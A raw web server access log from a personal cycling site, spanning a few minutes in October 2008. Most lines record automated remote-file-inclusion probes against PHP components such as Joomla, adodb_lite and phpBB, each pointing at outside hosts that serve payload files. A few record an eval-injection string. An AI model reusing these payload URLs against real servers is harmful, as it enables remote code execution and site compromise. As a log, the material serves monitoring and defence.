208.226.79.133 - - [26/Oct/2008:10:05:35 -0700] "GET /logs/access_080507.log/index.php?mosConfig_absolute_pathhttp://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:05:38 -0700] "GET /index.php?mosConfig_absolute_pathhttp://stalbert.org/images/special.txt?? HTTP/1.1" 200 94850 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Oct/2008:10:05:39 -0700] "GET /logs/index.php?mosConfig_absolute_pathhttp://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:05:42 -0700] "GET /logs/access_080825.log/errors.php?error=http://timjardim.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
83.102.137.163 - - [26/Oct/2008:10:05:56 -0700] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:05:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:06:00 -0700] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.158 - - [26/Oct/2008:10:06:02 -0700] "GET /logs/access_080918.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:06:09 -0700] "GET /bikes/WeSTOC08/dmulk_WeSTOC08_II.gpx HTTP/1.1" 200 2702746 "-" "Microsoft compass/1.0" "www.dmulk.com"
67.15.143.7 - - [26/Oct/2008:10:06:18 -0700] "GET /logs/access_080522.log//include/functions_common.php?gl_root_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:06:33 -0700] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:06:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-052.jpg HTTP/1.1" 200 320141 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:06:45 -0700] "GET /browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:06:48 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.187 - - [26/Oct/2008:10:06:56 -0700] "GET /bikes/dteel/2008_09_05/?S=A HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.143.7 - - [26/Oct/2008:10:06:57 -0700] "GET /include/functions_common.php?gl_root_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.203.140.19 - - [26/Oct/2008:10:07:03 -0700] "GET /logs/access_080218.log/index.php?view=page&pagename=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:07:03 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.203.140.19 - - [26/Oct/2008:10:07:04 -0700] "GET /logs/access_080303.log/index.php?view=page&pagename=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:07:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-029_0.jpg HTTP/1.1" 200 323717 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:07:06 -0700] "GET /logs/index.php?view=page&pagename=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.203.140.19 - - [26/Oct/2008:10:07:06 -0700] "GET /index.php?view=page&pagename=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 200 8097 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:07:08 -0700] "GET /?path%5Bdocroot%5D=http://mobart.ee/modules/readmes? HTTP/1.1" 200 94798 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.102.38 - - [26/Oct/2008:10:07:10 -0700] "GET /logs/access_080529.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.108.191 - - [26/Oct/2008:10:07:25 -0700] "GET /blog/index.php/2008/08/12/westoc-2008-trip-61208-62708/?show=slide&nggpage=8 HTTP/1.1" 200 66126 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:07:27 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:07:37 -0700] "GET /logs/access_071223.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:07:43 -0700] "GET /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:07:45 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:07:46 -0700] "GET /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:07:50 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:07:50 -0700] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.111.80.12 - - [26/Oct/2008:10:07:50 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.203.140.19 - - [26/Oct/2008:10:07:57 -0700] "GET /logs/access_080108.log/index.php?view=page&pagename=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:17 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.20.53.210 - - [26/Oct/2008:10:08:17 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:17 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:10:08:19 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:20 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:20 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.20.53.210 - - [26/Oct/2008:10:08:25 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.20.53.210 - - [26/Oct/2008:10:08:30 -0700] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:30 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.20.53.210 - - [26/Oct/2008:10:08:30 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:30 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:08:32 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:32 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
203.146.102.38 - - [26/Oct/2008:10:08:36 -0700] "GET /logs/access_080815.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:38 -0700] "GET //vwar/backup/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:08:41 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:42 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.202.242 - - [26/Oct/2008:10:08:43 -0700] "GET /errors.php?error=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.202.242 - - [26/Oct/2008:10:08:43 -0700] "GET /logs/access_080811.log/errors.php?error=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.202.242 - - [26/Oct/2008:10:08:43 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:08:43 -0700] "GET /logs/errors.php?error=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:08:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-080_1.jpg HTTP/1.1" 200 438291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:09:04 -0700] "GET /logs/access_080906.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:09:07 -0700] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.15.8.82 - - [26/Oct/2008:10:09:07 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 200 70881 "-" "libwww-perl/5.805" "www.dmulk.com"
83.15.8.82 - - [26/Oct/2008:10:09:08 -0700] "GET /?path%5Bdocroot%5D=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 200 94917 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.158 - - [26/Oct/2008:10:09:20 -0700] "GET /logs/access_081008.log/index.php?INCLUDE_FOLDER=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.142.223.158 - - [26/Oct/2008:10:09:21 -0700] "GET /index.php?INCLUDE_FOLDER=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 94840 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.48.189.45 - - [26/Oct/2008:10:09:24 -0700] "GET /logs/access_080216.log//index.php?option=com_puarcade&Itemid=&gid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.25.168.50 - - [26/Oct/2008:10:09:25 -0700] "GET /logs/access_080810.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.48.189.45 - - [26/Oct/2008:10:09:26 -0700] "GET /index.php?option=com_puarcade&Itemid=&gid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 200 95401 "-" "libwww-perl/5.79" "www.dmulk.com"
200.48.189.45 - - [26/Oct/2008:10:09:30 -0700] "GET /logs//index.php?option=com_puarcade&Itemid=&gid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.111.80.12 - - [26/Oct/2008:10:09:31 -0700] "GET /logs/access_080906.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:09:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-153_1.jpg HTTP/1.1" 200 300526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
78.111.80.12 - - [26/Oct/2008:10:09:40 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:09:40 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:09:40 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.111.80.12 - - [26/Oct/2008:10:09:41 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:09:59 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/048.jpg HTTP/1.1" 200 356266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:10:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-095_0.jpg HTTP/1.1" 200 339830 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:10:50 -0700] "GET /logs/access_080507.log/index.php?mosConfig_absolute_pathhttp://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:10:51 -0700] "GET /index.php?mosConfig_absolute_pathhttp://stalbert.org/images/special.txt?? HTTP/1.1" 200 94850 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.108.192 - - [26/Oct/2008:10:10:52 -0700] "GET /tmp/sess_1b71e16d4678a19772c167616589536c HTTP/1.1" 403 163 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:10:53 -0700] "GET /logs/index.php?mosConfig_absolute_pathhttp://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:10:53 -0700] "GET /logs/access_080214.log//index.php?option=com_puarcade&Itemid=&gid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:10:56 -0700] "GET /logs/access_080429.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:10:56 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:10:56 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:11:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-002_3.jpg HTTP/1.1" 200 456103 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:11:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-076.jpg HTTP/1.1" 200 452188 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:11:20 -0700] "GET /logs/access_080507.log/index.php?mosConfig_absolute_pathhttp://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:11:22 -0700] "GET /index.php?mosConfig_absolute_pathhttp://stalbert.org/images/special.txt?? HTTP/1.1" 200 94834 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:11:24 -0700] "GET /logs/index.php?mosConfig_absolute_pathhttp://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:11:30 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:11:30 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:11:31 -0700] "GET /index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 95007 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:11:31 -0700] "GET /index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 95023 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:11:32 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:11:32 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:10:11:40 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:11:41 -0700] "GET /bikes/dteel/DesertSTOC07/?S=A HTTP/1.0" 200 7603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:12:02 -0700] "GET /logs/access_080410.log//modules/vwar/admin/admin.php?vwar_root=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:12:03 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:12:03 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:12:05 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:12:11 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.142.223.158 - - [26/Oct/2008:10:12:13 -0700] "GET /logs/access_080830.log/index.php?INCLUDE_FOLDER=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [26/Oct/2008:10:12:13 -0700] "GET /index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 95023 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.233.172.64 - - [26/Oct/2008:10:12:15 -0700] "GET /logs/access_080531.log/dbase.php?action=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:12:15 -0700] "GET /dbase.php?action=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:12:15 -0700] "GET /logs/dbase.php?action=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.108.193 - - [26/Oct/2008:10:12:17 -0700] "GET /bikes/dteel/2008_07_03/?M=A HTTP/1.1" 200 851 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:12:27 -0700] "GET /logs/access_080702.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:12:31 -0700] "GET /logs/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:12:31 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:12:31 -0700] "GET /errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:12:32 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:12:32 -0700] "GET /logs/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:12:33 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:12:33 -0700] "GET /errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:12:33 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
